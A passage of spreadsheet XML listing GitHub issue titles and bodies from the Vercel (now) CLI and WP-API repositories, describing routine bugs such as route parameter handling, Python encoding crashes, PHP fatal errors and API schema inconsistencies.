    <t>https://github.com/zeit/now-cli/blob/7e98d0a22b5363f9d46274b4fcd4163ab0591275/src/providers/sh/util/index.js#L765 It should say `Failed to remove deployment` instead.</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2092</t>
  </si>
  <si>
    <t>[now-dev] Route parameters do not work in headers</t>
  </si>
  <si>
    <t xml:space="preserve">Route parameters do not work in "headers". In the following example, the correct $locale value is used for both _headers_ and _dest_ on Now server. In `now-dev`, `$locale` will resolves to the right value only for dest. When used in "headers" for redirect, $locale did not resolve to a value, a redirection to the literal path "/$locale/how/" occured.  routes: [ { "src": "/(?&lt;locale&gt;[^/]*)/how/$", "dest": "/how?locale=$locale" }, { "src": "/(?&lt;locale&gt;[^/]*)/how$", "status": 301, "headers": { "Location": "/$locale/how/" } } ] </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2148</t>
  </si>
  <si>
    <t>`now dev` is not respecting methods of routes</t>
  </si>
  <si>
    <t>## Issue When sending a `GET` request to `localhost:3000/api/users/14` it returns with the response from the `DELETE` method. It does not appear that `now dev` is respecting methods on the route. Similarly, if a `POST` request is made to `localhost:3000/api/status`, it is accepted, even though it is not a valid method.  { "version": 2, "name": "now-dev-issue", "builds": [ { "src": "www/package.json", "use": "@now/static-build" }, { "src": "api/*/*.js", "use": "@now/node@canary" } ], "routes": [ { "src": "/api/status", "methods": ["GET"], "dest": "/api/status/list.js" }, { "src": "/api/users", "methods": ["POST"], "dest": "/api/users/create.js" }, { "src": "/api/users/(?&lt;id&gt;[^/]+)", "methods": ["DELETE"], "dest": "/api/users/delete.js?id=$id" }, { "src": "/api/users/(?&lt;id&gt;[^/]+)", "methods": ["GET"], "dest": "/api/users/get.js?id=$id" }, { "src": "/api/users/(?&lt;id&gt;[^/]+)", "methods": ["PUT"], "dest": "/api/users/update.js?id=$id" }, { "src": "/(.*)", "dest": "/www/$1" } ] }  ## Sample Branch https://github.com/khrome83/now-dev-issue</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2162</t>
  </si>
  <si>
    <t>`now projects ` works, but `now project` does not</t>
  </si>
  <si>
    <t>When removing a project  $ now projects rm  The project: nodejs will be removed permanently. It will also delete everything under the project including deployments. &gt; Are you sure? [y/N]  but  $ now project rm  &gt; Error! The specified file or directory "project" does not exist.  By convention, both should wortk.</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2375</t>
  </si>
  <si>
    <t>PCRE passing undefined</t>
  </si>
  <si>
    <t>PCRE group is passing `undefined` as string to the query string rather than not passing it at all. Maybe this is a misconfiguration on my end.  { "version": 2, "builds": [ { "src": "./api/functions/**/*.js", "use": "@now/node" }, ], "routes": [ { "src": "/api/hello(/(?&lt;name&gt;[^/]+))?", "methods": ["GET"], "dest": "/api/functions/hello/index.js?name=$name" } ] }  If I just call `/api/hello`, it passes `"undefined"` as the `name`.</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2606</t>
  </si>
  <si>
    <t>We show a weird error when the auth token is expired</t>
  </si>
  <si>
    <t>This error is useless: ![image](https://user-images.githubusercontent.com/6170607/61789604-68f5db80-ae15-11e9-9124-fa6783740837.png) Instead, we want to tell the user: &gt; You don't have access to this deployment. Please log in: (and then we auto-trigger the login)</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2759</t>
  </si>
  <si>
    <t>Broken error when purchasing domains</t>
  </si>
  <si>
    <t>Currently, we're showing this if you try to purchase a domain: ![image](https://user-images.githubusercontent.com/6170607/62973981-7fd98d80-be17-11e9-85a9-b3f32686aff1.png) Instead, we want to STOP the spinner and print the error in a new fresh line. Furthermore, the error should not expose the entire stack trace. It should just print: &gt; An unexpected error occurred while purchasing your domain. Please try again later.</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2760</t>
  </si>
  <si>
    <t>404 error for removing deployment takes forever to exit</t>
  </si>
  <si>
    <t>Try removing any deployment (might be related to having used an alias) and you will notice that the command (even thought it printed a 404) will take forever to exit: ![2019-08-14 00 43 07](https://user-images.githubusercontent.com/6170607/62982483-8c1c1580-be2c-11e9-8d61-9e03d6413790.gif)</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/2901</t>
  </si>
  <si>
    <t>Errors are not being rendered</t>
  </si>
  <si>
    <t>If you break a serverless Node.js API, the error will not be rendered if you send a request to that file. Instead, it will load forever: [bad error handling.mp4.zip](https://github.com/zeit/now/files/3550905/bad.error.handling.mp4.zip)</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/3042</t>
  </si>
  <si>
    <t>"Authentication error" on canary instead of "You are not owner of the domain"</t>
  </si>
  <si>
    <t xml:space="preserve">When adding an `alias` to now.json that the current token does not own, the stable channel shows:  &gt; Deploying ~/Code/foo under username &gt; Using project projectname &gt; Error! You are not owner of the domain "example.com"  However, the canary channel has regressed and shows the following:  &gt; Deploying ~/Code/foo under username &gt; Using project projectname &gt; Error! Authentication error. Run `now login` to log-in again. </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/3091</t>
  </si>
  <si>
    <t>UnicodeEncodeError in python builder</t>
  </si>
  <si>
    <t>Any payload that has non-ascii characters in it blows up if not encoded in latin-1. All payloads from browsers will be utf-8. To reproduce: Have a web app send (fetch) a json payload with strings with Greek (or other non-ascii characters) to a python endpoint deployed on now. Logs:  Duration: 1.84 ms Billed Duration: 100 ms Memory Size: 3008 MB Max Memory Used: 66 MB Unhandled exception in thread started by &lt;bound method BaseServer.handle_request of &lt;http.server.HTTPServer object at 0x7f83a3e29e48&gt;&gt; Traceback (most recent call last): File "/var/lang/lib/python3.6/socketserver.py", line 298, in handle_request ready = selector.select(timeout) File "/var/lang/lib/python3.6/selectors.py", line 376, in select fd_event_list = self._poll.poll(timeout) PermissionError: [Errno 1] Operation not permitted 'latin-1' codec can't encode characters in position 2370-2379: Body ('') is not valid Latin-1. Use body.encode('utf-8') if you want to send it encoded in UTF-8.: UnicodeEncodeError Traceback (most recent call last): File "/var/task/now__handler__python.py", line 42, in now_handler headers=headers, data=body, allow_redirects=False) File "/var/task/requests/api.py", line 60, in request return session.request(method=method, url=url, **kwargs) File "/var/task/requests/sessions.py", line 533, in request resp = self.send(prep, **send_kwargs) File "/var/task/requests/sessions.py", line 646, in send r = adapter.send(request, **kwargs) File "/var/task/requests/adapters.py", line 449, in send timeout=timeout File "/var/task/urllib3/connectionpool.py", line 672, in urlopen chunked=chunked, File "/var/task/urllib3/connectionpool.py", line 387, in _make_request conn.request(method, url, **httplib_request_kw) File "/var/lang/lib/python3.6/http/client.py", line 1254, in request self._send_request(method, url, body, headers, encode_chunked) File "/var/lang/lib/python3.6/http/client.py", line 1299, in _send_request body = _encode(body, 'body') File "/var/lang/lib/python3.6/http/client.py", line 171, in _encode (name.title(), data[err.start:err.end], name)) from None UnicodeEncodeError: 'latin-1' codec can't encode characters in position 2370-2379: Body ('') is not valid Latin-1. Use body.encode('utf-8') if you want to send it encoded in UTF-8.  Full reproduction here: https://github.com/offero/nowpyunicodefail</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/3539</t>
  </si>
  <si>
    <t>now.json "rewrites" routes with dynamic params 404 using `now dev`</t>
  </si>
  <si>
    <t xml:space="preserve"> Reduced test-case: https://github.com/wilsonpage/zeit-now-next-rewrites-bug  Steps: 1. Run `now dev` 2. Visit http://localhost:3000/hello 3. Observe `world` `200` response  4. Visit http://localhost:3000/hello-regex/john 5. Observe `404` response  6. Visit http://localhost:3000/hello-param/john 7. Observe `404` response </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/3772</t>
  </si>
  <si>
    <t>now dev requires login and is missing --token from help</t>
  </si>
  <si>
    <t>`now dev` requires login now. If you don't log in it gives you a fun error like this:  Error! An unexpected error occurred! Error: The specified token is not valid at Object.getUser (/home/user/.config/yarn/global/node_modules/now/dist/index.js:2:2248948) at processTicksAndRejections (internal/process/task_queues.js:94:5) Error: The specified token is not valid at Object.getUser (/home/user/.config/yarn/global/node_modules/now/dist/index.js:2:2248948) at processTicksAndRejections (internal/process/task_queues.js:94:5)  In CI you can specify a token using `-t` or `--token`, but this is not listed in the description shown by specifying `--help`.</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/5580</t>
  </si>
  <si>
    <t>Python bug: error occurs when url including special charactors visited</t>
  </si>
  <si>
    <t xml:space="preserve">The server cannot deal with url with special charactors when the serverless function is written in python using handler that inherits from the BaseHTTPRequestHandler class. For example, https://test.nicelee.vercel.app/api/date goes right, while https://test.nicelee.vercel.app/api/date?test=%E5%93%88%E5%93%88 goes wrong, or https://test.nicelee.vercel.app/api/date?test= goes wrong The serverless function follows here.  from http.server import BaseHTTPRequestHandler, HTTPServer from datetime import datetime count = 0 class handler(BaseHTTPRequestHandler): def do_GET(self): global count count = count + 1 self.send_response(200) self.send_header('Content-type', 'text/plain') self.end_headers() self.wfile.write(str(datetime.now().strftime('%Y-%m-%d %H:%M:%S\n')).encode()) self.wfile.write(str(count).encode()) return </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/7283</t>
  </si>
  <si>
    <t>[CLI] When "vercel dev" proxies a request to a framework, its queries are not original ones and will result in errors for Vite.</t>
  </si>
  <si>
    <t>When Vite plugins processing a Vue Single File Component(SFC) file, it will transform its style tag into a js file with a url like `/foo/bar/AComponent.vue?vue&amp;type=style&amp;index=0&amp;lang.css`. Then it was used as a js module in the page. However when Vercel CLI dev server proxying it to frontend dev server, the cli doesn't use original url but generates a new one. Generated one is like: `/foo/bar/AComponent.vue?vue=&amp;type=style&amp;index=0&amp;lang.css=`, which is not a valid css url that can be recognized by Vite. Its content is not processed by css plugins of Vite, but it's still used as a js module. Because of that, when running "vercel dev", if you write some css rules in the style tag of a Vue SFC file, the page will become blank and throw errors in browser console. It's very inconvenient for Vue developers if we can't use style tag in SFC. Cause is at: https://github.com/vercel/vercel/blob/bae26cc0178ff49c3050ceaf5db00969e510cc6b/packages/cli/src/util/dev/server.ts#L1703-L1707 Here it deletes original querystring (`origUrl.search`), and generates a new one together with pathname (`url.format(origUrl)`), which is the one with additional "=". (`url.format()` internally uses `querystring.stringify()` that will add "=" for empty fields in the object). In my local repo, I deleted L1704 &amp; L1706 then it worked as expected. `url.format()` now uses original search string, so additional "="s are gone. But I don't know if it will impact other frameworks.</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/9132</t>
  </si>
  <si>
    <t>Python ASGI functions crashing on incoming headers</t>
  </si>
  <si>
    <t>## Issue When deploying a Python ASGI application (e.g. using FastAPI, Sanic) with Vercel Serverless, the function is built successfully but invoking the URL the function leads to a crash with a 500 error. Here is the backend log from Vercel:  [ERROR] AttributeError: 'list' object has no attribute 'encode' Traceback (most recent call last): File "/var/task/vc__handler__python.py", line 288, in vc_handler 'headers': [[k.lower().encode(), v.encode()] for k, v in headers.items()], File "/var/task/vc__handler__python.py", line 288, in &lt;listcomp&gt; 'headers': [[k.lower().encode(), v.encode()] for k, v in headers.items()],  ## Investigations It seems there is an issue with incoming complex headers parsing for ASGI functions: - Python WSGI applications (e.g. using Flask) do not show this error - Invocations of ASGI functions using `curl` or `httpie` works perfectly, no errors - Bisecting headers from the web browser (Firefox, Chrome), here is a faulty header causing the crash:  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  - Invocations of ASGI functions using `curl` or `httpie` using the above header are triggering the error ## Reproduction A simple hello world app with FastAPI or Sanic in a module name `app.py`: python from fastapi import FastAPI app = FastAPI() @app.get("/") def index(): return {"message": "Hello World"}  python from sanic import Sanic from sanic.response import json app = Sanic(name=__name__) @app.route("/") async def index(request): return json({"message": "Hello World"})  `vercel.json`:  { "builds": [ { "src": "app.py", "use": "@vercel/python" } ], "routes": [ { "src": "/(.*)", "dest": "app.py" } ] }  ## Related issues - https://github.com/vercel/vercel/issues/2526</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/72</t>
  </si>
  <si>
    <t>PHP Notice thrown if no created / published posts and requesting Custom Post Type</t>
  </si>
  <si>
    <t>In this scenario, php returns a notice in which the `$post` object in `wp-includes/post-template.php` is null.  Notice: Trying to get property of non-object in wp-includes/post-template.php on line 209  Again, the notice throws only when no posts are created / published and you are attempting to request a custom post type (ie wp-json.php/posts?type=custom_post_type) Tested with: WP 3.8.1 WP-API 0.8</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/90</t>
  </si>
  <si>
    <t>WP_JSON_CustomPostType does not accept JSON for editing/creating posts</t>
  </si>
  <si>
    <t>Title says it all.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/91</t>
  </si>
  <si>
    <t>Raw data goes unused when sent to an endpoint.</t>
  </si>
  <si>
    <t xml:space="preserve">In class-wp-json-server.php, when dispatching callbacks if an endpoint expects raw data that data will end up going unused breaking the endpoint:  php elseif ( $supported &amp; self::ACCEPT_RAW ) { $data = $this-&gt;get_raw_data(); } </t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/164</t>
  </si>
  <si>
    <t>Revisions endpoint not working</t>
  </si>
  <si>
    <t>I have a post with 3 revisions. This GET request returns the information about the post: http://local.trunk.dev/wp-json/posts/3184 This GET request outputs simply "null": http://local.trunk.dev/wp-json/posts/3184/revisions</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/166</t>
  </si>
  <si>
    <t>Comment endpoint throws fatal error for invalid comments</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to grab a non-existent comment from a post like so: http://local.trunk.dev/wp-json/posts/3184/comments/2 This error is thrown:  &lt;br /&gt; &lt;b&gt;Fatal error&lt;/b&gt;: Call to a member function format() on a non-object in &lt;b&gt;/srv/www/trunk/wp-content/plugins/wp-api/lib/class-wp-json-posts.php&lt;/b&gt; on line &lt;b&gt;1018&lt;/b&gt;&lt;br /&gt; </t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/221</t>
  </si>
  <si>
    <t>Required parameter check for user update is in wrong place</t>
  </si>
  <si>
    <t>We currently check for the required parameters (`username`, `password`, `email`) on update, not creation. This should be flipped.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/224</t>
  </si>
  <si>
    <t>/media doesn't return the alternative text</t>
  </si>
  <si>
    <t>The media endpoint should return the alternative text for attachments</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/228</t>
  </si>
  <si>
    <t>Post parent read from incorrect key</t>
  </si>
  <si>
    <t>When setting a post parent, the value is currently pulled from the `post_parent` key, not the `parent` key.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/229</t>
  </si>
  <si>
    <t>Draft posts should return null for dates</t>
  </si>
  <si>
    <t>At the moment, they return `0000-00-00 00:00:00` as per core, or a weirder date (such as `date('c', 0)`)</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/290</t>
  </si>
  <si>
    <t>User email addresses are exposed in read context</t>
  </si>
  <si>
    <t>Critical privacy issue: email is exposed to all users, not just in the edit context. We need to fix this.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/299</t>
  </si>
  <si>
    <t>Media meta sizes has inconsistent data type</t>
  </si>
  <si>
    <t>If a media object does not have any size metadata available, the response value is an empty array (`[]`). If it does have values, then the response value is a dictionary (`{ thumbnail: {  },  }`). For the empty case it should probably instead return an empty dictionary to simplify the deserialization logic for clients.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/330</t>
  </si>
  <si>
    <t>/posts endpoint ignores context=edit parameter</t>
  </si>
  <si>
    <t xml:space="preserve">Assuming: - a custom post type of `my_custom_type` - several custom fields like `a_custom_field` and `b_custom_field` The following endpoint doesn't include the custom fields in the meta data:  /posts?type=my_custom_type&amp;context=edit  Unless I'm misunderstanding the docs, the `/posts` endpoint should include custom meta data. The custom fields meta data **is** included when I try the following:  /posts/19?context=edit </t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/409</t>
  </si>
  <si>
    <t>Taxonomies don't support dashes in slugs</t>
  </si>
  <si>
    <t>When performing a GET request on /wp-json/taxonomies/the-name/terms, the taxonomy 'the-name' cannot be found and returns a 'json_no_route' error. I believe this is due to the taxonomy having a dash in the name.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/411</t>
  </si>
  <si>
    <t>Fatal Error when retrieving child comment</t>
  </si>
  <si>
    <t>An error occurs when you call posts/{postid}/comments/{commentid} where the selected comment has a parent (a reply). Fatal error: Call to a member function format() on a non-object in \class-wp-json-posts.php on line 1607 If I manually change "comment_parent" in the DB to 0 I do not get the error.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/414</t>
  </si>
  <si>
    <t>Getting Parent Post / Comment but not doing anything with it</t>
  </si>
  <si>
    <t xml:space="preserve">It seems like there was an intention to populate the `parent` field of a comment with the actual parent object (post for top-level comments and comment for child comments), however the `$fields['parent']` value gets overwritten at the end with the `$comment-&gt;comment_parent` which I think is the logical thing to put in the `parent` field anyways. Can we have all the parent object info go into a `parent_object` field or some other name that's not `parent` or do we rip this code out altogether? [lib/class-wp-json-response.php:1570-1589](/WP-API/WP-API/blob/master/lib/class-wp-json-posts.php#L1570-1589)  php // Post if ( 'single'  $context ) { $parent = get_post( $post['post_parent'], ARRAY_A ); $fields['parent'] = $this-&gt;prepare_post( $parent, 'single-parent' ); } // Parent if ( ( 'single'  $context || 'single-parent'  $context ) &amp;&amp; (int) $comment-&gt;comment_parent ) { $parent_fields = array( 'meta' ); if ( $context  'single' ) { $parent_fields[] = 'comment'; } $parent = get_comment( $post['post_parent'] ); $fields['parent'] = $this-&gt;prepare_comment( $parent, $parent_fields, 'single-parent' ); } // Parent $fields['parent'] = (int) $comment-&gt;comment_parent; </t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/444</t>
  </si>
  <si>
    <t>Error on Post Update of featured_image</t>
  </si>
  <si>
    <t>Fatal error: Cannot use object of type WP_JSON_Response as array in /var/www/wordpress/wp-content/plugins/WP-API/lib/class-wp-json-media.php on line 437</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/492</t>
  </si>
  <si>
    <t>API incompatible with setup_postdata</t>
  </si>
  <si>
    <t>Hello, Using this API and setting up the results with `setup_postdata()` again in another WordPress site creates incompatibility issues on the following properties: `post_author` versus `author` `post_date` versus `date` `post_content` versus `content` `post_title` versus `title` This means that `the_title()`, `the_content()`, etc will not work anymore. I can understand the desire to change these ancient property names to something that makes sense but it breaks compatibility with very standard WordPress functions which most people expect to work. We fixed our problem by filtering `json_prepare_post` and assigning the properties. Related closed issue. https://github.com/WP-API/WP-API/issues/41</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/661</t>
  </si>
  <si>
    <t>The response from creating or updating a User should pass context = edit</t>
  </si>
  <si>
    <t xml:space="preserve">When returning the User response from `WP_JSON_Users_Controller-&gt;create_item()` or `WP_JSON_Users_Controller-&gt;update_item()` the edit context should be passed. This:  $response = $this-&gt;get_item( array( 'id' =&gt; $user_id ) );  Becomes:  $response = $this-&gt;get_item( array( 'id' =&gt; $user_id, 'context' =&gt; 'edit', ) ); </t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/862</t>
  </si>
  <si>
    <t>Post query returns json_invalid_query for valid query</t>
  </si>
  <si>
    <t>If you do a query that happens to have no results (e.g. `cat=2` where the category has no posts), you get back a 404 and a `json_invalid_query` error. This should just be an empty JSON list, and not an error.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1023</t>
  </si>
  <si>
    <t>Fix comment schema; return error when response data doesn't match schema</t>
  </si>
  <si>
    <t>In #955, @rmccue was able to change the response format for a comment without updating the schema. The API shouldn't ever return a response that doesn't match the declared schema. In this issue, we should: 1. Fix the schema, somewhat contingent on #1022 2. Return a 500 error when the produced response doesn't match the schema, instead of a malformed object. Note for the second, I'm just referring to fields in the response that are missing or of a different format than in the declared schema. Additional fields can be ignored.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1143</t>
  </si>
  <si>
    <t>Multiple errors via param validation should be programmatically readable</t>
  </si>
  <si>
    <t>Currently if a request contains multiple invalid request args, we compile an error string showing all the issues. However, we don't pass all the different fields that errored. From @rmccue in slack: &gt; `new WP_Error( 'json_missing_field', 'Missing $field', array( 'key' =&gt; $field ) )` &gt; Would output as `[ { "code": "json_missing_field", "message": "Missing abc", "data": { "key": "abc" } }]`</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1227</t>
  </si>
  <si>
    <t>HTML entities are not decoded</t>
  </si>
  <si>
    <t>I'll suggest to evaluate a decoding of html entities. E.g. I have a category in Wordpress whose name is "&gt; something". The '&gt;' char is stored on the db by Wordpress as '&amp;gt;' and when I query the plugin, I still get '&amp;gt;'. However JSON is not HTML, and probably the use of HTML entities is not good. I suggest to use html_entity_decode() on category names, slugs and so on.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1310</t>
  </si>
  <si>
    <t>Client JS is broken because it's referencing the wrong API URL</t>
  </si>
  <si>
    <t>Not sure if this should be fixed in `WP_API_Settings` or if the client script should append `/wp/v2`  but either way, the client helpers don't work in the current version. If someone would let me know which one needs to change, I'd be happy to spin up a PR.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1395</t>
  </si>
  <si>
    <t>Taxonomy term IDs not the same as what Wordpress actually wants?</t>
  </si>
  <si>
    <t>I'm seeing some very strange behavior when creating and then associating terms via the REST API: - The API will create the new term as requested and return a well-formed response including the new term ID. - Attempting to associate the new term using the returned ID to an existing post will succeed as well (HTTP 201). - However, when viewing the post in WP-Admin, some of the term associations are either missing or entirely wrong. What's really strange is that I can import a term via the API and then go search for it in WP-Admin as well. The ID that I got back in my REST response is NOT the term ID that Wordpress is using to render the Edit form for the term. That seems a red flag to me, but I'm not sure how or why it's happening. Attached are screenshots of importing the term, associating the term, searching for the term against the REST API -- these are all in agreement with each other. ![screen shot 2015-07-11 at 1 50 26 pm](https://cloud.githubusercontent.com/assets/643118/8634836/5c4406b4-27d7-11e5-8569-b9565d331183.png) ![screen shot 2015-07-11 at 2 05 33 pm](https://cloud.githubusercontent.com/assets/643118/8634838/697a5b80-27d7-11e5-9775-fd90a95aa364.png) ![screen shot 2015-07-11 at 2 19 15 pm](https://cloud.githubusercontent.com/assets/643118/8634851/fc4c0ff8-27d7-11e5-88a8-08f046b292e3.png) ![screen shot 2015-07-11 at 1 53 00 pm](https://cloud.githubusercontent.com/assets/643118/8634840/784d96f4-27d7-11e5-9c90-78514d77fd95.png) The last two screenshots are from the WP-Admin, and they clearly show that "Women's Tennis" is not associated to the Post, and the term ID is also different (27564 != 27580). ![screen shot 2015-07-11 at 1 56 15 pm](https://cloud.githubusercontent.com/assets/643118/8634841/7cb7723c-27d7-11e5-8371-cb4e8fb09216.png) ![screen shot 2015-07-11 at 1 56 52 pm](https://cloud.githubusercontent.com/assets/643118/8634842/7fa41388-27d7-11e5-8bad-7dfa14c07241.png) Any idea what's going wrong here?</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1548</t>
  </si>
  <si>
    <t>Approving a comment deletes content and author</t>
  </si>
  <si>
    <t>_Bug:_ Changing comment status from hold to approved using a PUT request deletes the comment author and comment content. I am using the basic auth plugin and an $http request in AngularJS. _How to replicate:_ Add an unapproved comment to your site with the WP API v2 and basic auth plugins installed. Using Postman, send a PUT request with a basic auth header to a comment endpoint, such as mysite.com/wp-json/wp/v2/comments/54 In the form data, send along status=approved. The comment will be approved, but the comment author and comment content are deleted.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1621</t>
  </si>
  <si>
    <t>WP_REST_Request:get_params()/get_param() returns route</t>
  </si>
  <si>
    <t>Not sure if this was intended, but it's annoying me. In my callback, where `$request` is `WP_REST_Request` object and I do this:  $params = $request-&gt;get_params(); $zero = $request-&gt;get_param( 0 );  I get a 0 index in `$params` and `$zero` has the route URL. I don't see why it &lt;em&gt;should&lt;/em&gt; be a param, it's not registered on the endpoint, and its redundant to what I can get with the `get_url_params()` method.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1763</t>
  </si>
  <si>
    <t>Don't permit requesting terms cross routes</t>
  </si>
  <si>
    <t>I have a category with `term_taxonomy_id=1`:  GET http://wordpress-develop.dev/wp-json/wp/v2/terms/category/1  I shouldn't be able to request it from the `tag` endpoint:  http://wordpress-develop.dev/wp-json/wp/v2/terms/tag/1  Reported in https://wordpress.org/support/topic/incorrect-route-wordpress-44-beta-4?replies=5</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/1959</t>
  </si>
  <si>
    <t>GET request for media files results in an empty array</t>
  </si>
  <si>
    <t>Hi I have been trying to fetch all the media files from the REST API using restangular, but no matter how I try it fails, so I decided to test the media endpoint via PostMan app and realized that although I can see the media files json object in my browsers when I browse to /wp-json/wp/v2/media but using PostMan or using restangular it always results in an empty array. The funny part is that during the time I was pulling my hair for getting the media files, the files showed up only once, and after one refresh they were gone forever, this could be a bug in the wp rest plugin.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2309</t>
  </si>
  <si>
    <t>Wrong paging when retrieving categories list</t>
  </si>
  <si>
    <t>The following requests return the same result (for per_page &gt;10): http://blog.lo/wp-json/wp/v2/categories?page=1&amp;per_page=100 http://blog.lo/wp-json/wp/v2/categories?page=2&amp;per_page=100  http://blog.lo/wp-json/wp/v2/categories?page=1232&amp;per_page=100 But the following requests work correctly: http://blog.lo/wp-json/wp/v2/categories?page=1&amp;per_page=10 http://blog.lo/wp-json/wp/v2/categories?page=2&amp;per_page=10  http://blog.lo/wp-json/wp/v2/categories?page=1232&amp;per_page=10</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2416</t>
  </si>
  <si>
    <t>Only include Post data on the response object when declared in schema</t>
  </si>
  <si>
    <t>This is what our code path looks like currently:  setup_postdata( $post ); // Base fields for every post. $data = array( 'id' =&gt; $post-&gt;ID, 'date' =&gt; $this-&gt;prepare_date_response( $post-&gt;post_date_gmt, $post-&gt;post_date ), 'date_gmt' =&gt; $this-&gt;prepare_date_response( $post-&gt;post_date_gmt ), 'guid' =&gt; array( /** This filter is documented in wp-includes/post-template.php */ 'rendered' =&gt; apply_filters( 'get_the_guid', $post-&gt;guid ), 'raw' =&gt; $post-&gt;guid, ), 'modified' =&gt; $this-&gt;prepare_date_response( $post-&gt;post_modified_gmt, $post-&gt;post_modified ), 'modified_gmt' =&gt; $this-&gt;prepare_date_response( $post-&gt;post_modified_gmt ), 'password' =&gt; $post-&gt;post_password, 'slug' =&gt; $post-&gt;post_name, 'status' =&gt; $post-&gt;post_status, 'type' =&gt; $post-&gt;post_type, 'link' =&gt; get_permalink( $post-&gt;ID ), ); $schema = $this-&gt;get_item_schema(); if ( ! empty( $schema['properties']['title'] ) ) { $data['title'] = array( 'raw' =&gt; $post-&gt;post_title, 'rendered' =&gt; get_the_title( $post-&gt;ID ), ); }  If I remove `title` as a property from the schema, it's not included in the response. However, if I remove `password` from schema properties, it's still included on the response object. I'd expect the response object would only have fields declared in the schema, or at least that WP REST API wouldn't blindly add database data to the response if was purposefully removed from the schema.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2426</t>
  </si>
  <si>
    <t>Inconsistent type returned for user capabilities.</t>
  </si>
  <si>
    <t>When a WP user has capabilities and a call is made to `/users/:id?context=edit`, a JSON object/map is returned (`"capabilities": {"a":"foo", "b":"bar"}`). However, when a user has no capabilities (`- No role for this site -` selected in wp-admin), an empty array is returned (`"capabilities": []`).</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2582</t>
  </si>
  <si>
    <t>Using term filters can cause the API to return objects instead of arrays</t>
  </si>
  <si>
    <t>Hi, WordPress allows you to filter processes like get_terms. Through this you can unset terms from the array that's then returned for further processing. A side effect of doing this that affects the JSON encoder but not normally further PHP processing is that the JSON encoder must now output arrays filtered in this way as JSON objects instead of arrays, because the internal structure of the array is now key/value due to deleted numeric keys (wrong terminology, but it sort of works). An example of the problem is here: http://stackoverflow.com/questions/5943149/rebase-array-keys-after-unsetting-elements Should the API: a) defensively call array_values on things it expects to be trying to output as an array? (So that the API contract can't be broken), or: b) should this be documented behaviour and it's the responsibility of the filter developer to call array_values? I might suggest (a), if only because there may be plugins out in the world that do not call array_values because it's never affected PHP, but being used on sites that then would have potentially random WP-API behaviour switching between Object and Array for filtered and non-filtered term arrays. This probably isn't restricted to term filters, but it's where I noted the behaviour.</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2587</t>
  </si>
  <si>
    <t>"registered_date" type is "date-time"</t>
  </si>
  <si>
    <t>the schema on wp/v2/users returns: "registered_date": { "description": "Registration date for the resource.", "type": "date-time", "context": [ "edit" ], "readonly": true }, according to json-schema v4 "type": "date-time" is NOT a valid type and it brakes parsers. it should be "string" with "format":"date-time" ref: http://json-schema.org/latest/json-schema-core.html#anchor8 http://json-schema.org/latest/json-schema-validation.html#anchor107 example: "registered_date": { "description": "Registration date for the resource.", "type": "string", "format": "date-time", "context": [ "edit" ], "readonly": true },</t>
  </si>
  <si>
    <t>https://github.com/WP-API/WP-API/issues/2616</t>
  </si>
  <si>
    <t>Boolean request args fail validation</t>
  </si>
  <si>
